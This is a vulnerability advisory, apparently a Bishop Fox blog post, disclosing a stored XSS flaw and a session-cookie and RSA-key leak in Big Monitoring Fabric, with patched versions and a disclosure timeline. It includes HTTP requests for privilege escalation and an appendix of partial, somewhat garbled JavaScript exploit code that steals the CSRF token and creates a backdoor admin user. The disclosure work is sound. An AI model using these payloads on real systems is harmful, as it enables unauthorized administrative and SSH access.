Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management. Read the Report ›

Big Monitoring Fabric Application

Gauge showing high severity reading



The following document describes identified vulnerabilities in the Big Monitoring Fabric application. Two high-risk vulnerabilities were found within the application.


Successful exploitation of the cross-site scripting (XSS) vulnerability would grant an unauthenticated remote attacker administrative access to the Big Monitoring Fabric application and (due to the nature of the application) SSH console access to the affected system.

The sensitive information disclosure vulnerability could be exploited by a low privilege read-only user to escalate their privileges up to an administrative account. Exploitation would allow the attacker to have SSH console access to the affected system.

Risk Level

Two high-risk vulnerabilities.

Affected Vendor

Product Vendor

Product Name

Affected Version

Big Switch Networks Big Monitoring Fabric until version 7.1.4

Product Description

Big Monitoring Fabric is an enterprise network switch monitoring and management software solution. The project’s official website is

Vulnerabilities List:

Two vulnerabilities were identified within the Big Monitoring Fabric application:


Update to the appropriate version, detailed in the table below:

Application Patched Version(s)
Big Monitoring Fabric 6.2.4, 6.3.9, 7.0.3, 7.1.4
Big Cloud Fabric 4.5.5, 4.7.7, 5.0.1, 5.1.4
Multi-Cloud Director 1.1.0



  1. Initial Discovery: 07/19/2019
  2. Contact with vendor: 07/19/2019
  3. Vendor acknowledges vulnerabilities: 07/19/2019
  4. Vendor releases patched versions: 10/31/2019
  5. Vulnerability disclosed: 12/27/2019




Security Risk


Access Vector

CVE-2019-19632 High Code Execution & Escalation of privileges Remote

The /login< endpoint in the Big Monitoring Fabric application was vulnerable to stored XSS. An unauthenticated user could submit an invalid username containing a JavaScript XSS payload during the login process, as shown below:

Figure 1 - XSS payload in failed login attempt

Figure 1 - XSS payload in failed login attempt

The application logged the XSS payload within the invalid username to the/login_history endpoint. The application response contained the arbitrary JavaScript within the XSS payload, as shown below:

Figure 2 - XSS payload shown in /login_history page source code

Figure 2 - XSS payload shown in /login_history page source code

The JavaScript payload then executed when an administrative user navigated to the affected /login_history endpoint. The payload loaded an external attacker-controlled JavaScript file that created a backdoor admin user (the code for which is included in Appendix A of this advisory). The payload was Base64-encoded and placed in an eval function. The backdoor XSS user was then created, as shown below:

Figure 3: XSS created backdoor admin user

Figure 3 - XSS created backdoor admin user

The team then authenticated to the Big Monitoring Fabric application with administrative permissions using the newly created XSS user. At this point, the team changed the Default admin password, allowing for SSH console access, as shown in the sensitive information disclosure of this advisory.


The Big Monitoring Fabric application was affected by one sensitive information disclosure vulnerability. The sensitive information disclosure revealed valid session data for administrative users and RSA private keys that allowed vertical and horizontal privilege escalation.


Security Risk


Access Vector

CVE-2019-19631 High Code Execution, Escalation of privileges, & Information Disclosure Remote

Session Data and RSA Private Keys

While authenticated as a user in read-only or admin groups, the API /api/v1/export endpoint returned SSH RSA private keys and valid user session cookies, including those for administrative users, as shown below:

Request to API export endpoint
POST /ws/request HTTP/1.1
…omitted for brevity…
{"request"{"timeout":10,"method":"GET", "path":"/api/v1/export","headers":{"Content-Type":"application/json"},"query":""}}

The SSH private keys appeared to be legitimate, but the team was unable to use them to gain further access with the keys. The admin session cookie was valid and read-only users could use it to perform vertical privilege escalation. First, the following API request was sent to remove a low-privilege read-only user from the read-only group:

pre>PATCH /api/v1/data/controller/core/aaa/group[name="read-only"]

…omitted for brevity…

Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM

…omitted for brevity…


Figure 4 - Request to remove low user from read-only group

The application responded with a 204 status code, which indicated that the user had successfully been removed from the low privilege group. Once the user was removed from the read-only group, the following request was sent to add the user to the admin group:

PATCH /api/v1/data/controller/core/aaa/group[name="admin"]
…omitted for brevity…
Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM
…omitted for brevity…

Figure 5 - Request to add low user to admin group

The team then authenticated to the Big Monitoring Fabric application with the low user, which now had administrative privileges. Using the newly gained administrative permissions, the Default admin password was changed, as shown below:

FIGURE 6 - Default admin password reset

Figure 6 - Default Admin password reset

The password change did not require knowledge of the original password. The Default Admin password change also affected the SSH console admin authentication, which allowed access the SSH console with the new credentials.

APPENDIX A - XSS Exploit Code

The following code was created and used for the XSS finding of this advisory:

// XSS payload to create a backdoor admin user
// Payload was base64 encoded and wrapped in JavaScript eval(atob("[Encoded Payload Here]"))
//Function to Create backdoor user
Backdoor = async () => {
    var xhr = new XMLHttpRequest();"POST", "/ws/request", true);
    xhr.withCredentials = true;
    xhr.setRequestHeader("Content-Type", "application/json");
    //Grab csrftoken from cookies and set to header
    xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new RegExp('(ˆ|)'+'csrftoken' + '=([ˆ;]+)'))[0].split('=')[1]);

//Function to grant admin permissions
getAdmin = async () => {
    var xhr = new XMLHttpRequest();"POST", "/ws/request", true);
    xhr.withCredentials = true;
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new </span><span style="font-size:16px;">RegExp('(ˆ|)'+'csrftoken' + '=([ˆ;]+)'))[0].split('=')[1])</span><span style="font-size:16px;">;


Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

Chris davis

About the author, Chris Davis

Senior Security Consultant

Chris Davis is a Senior Security Consultant at Bishop Fox. His areas of expertise are application penetration testing (static and dynamic) and external network penetration testing.

Chris actively conducts independent security research and has been credited with the discovery of 40 CVEs (including CVE-2019-7551 and CVE-2018-17150) on enterprise-level, highly distributed software. The vulnerabilities he identified included remote code execution and cross-site scripting (XSS).
More by Chris

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.